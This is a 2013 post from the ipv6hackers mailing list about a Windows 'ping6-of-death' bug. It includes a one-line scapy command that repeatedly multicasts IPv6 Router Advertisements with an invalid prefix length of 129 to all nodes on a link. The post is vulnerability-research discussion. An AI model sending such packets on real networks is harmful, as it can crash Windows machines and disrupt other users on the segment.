[ipv6hackers] Windows ping6-of-death

Pierre Emeriaud petrus.lt at gmail.com
Wed Aug 14 10:49:05 CEST 2013


2013/8/14 Fernando Gont <fgont at si6networks.com>:
>
> Ironically enough, they are vulnerable to attack because they don't
> enforce sanity checks, and the ra6 tool of the IPv6-Toolkit cannot
> exploit this attack because it enforces sanity checks on the Prefix
> lenghts given by the user. :-)

I tried to send the following frame with scapy. It was sent correctly
but unfortunately I don't have any Windows boxen to test it:
>>> sendp(Ether()/IPv6(dst="ff02::1")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix="2001:db8:bad:cafe::",prefixlen=129), loop=1, inter=0.5)

The incorrect prefix length was seen on the wire, but I don't know if
that would be enough to exploit the vuln.


Regards,
Pierre.



More information about the Ipv6hackers mailing list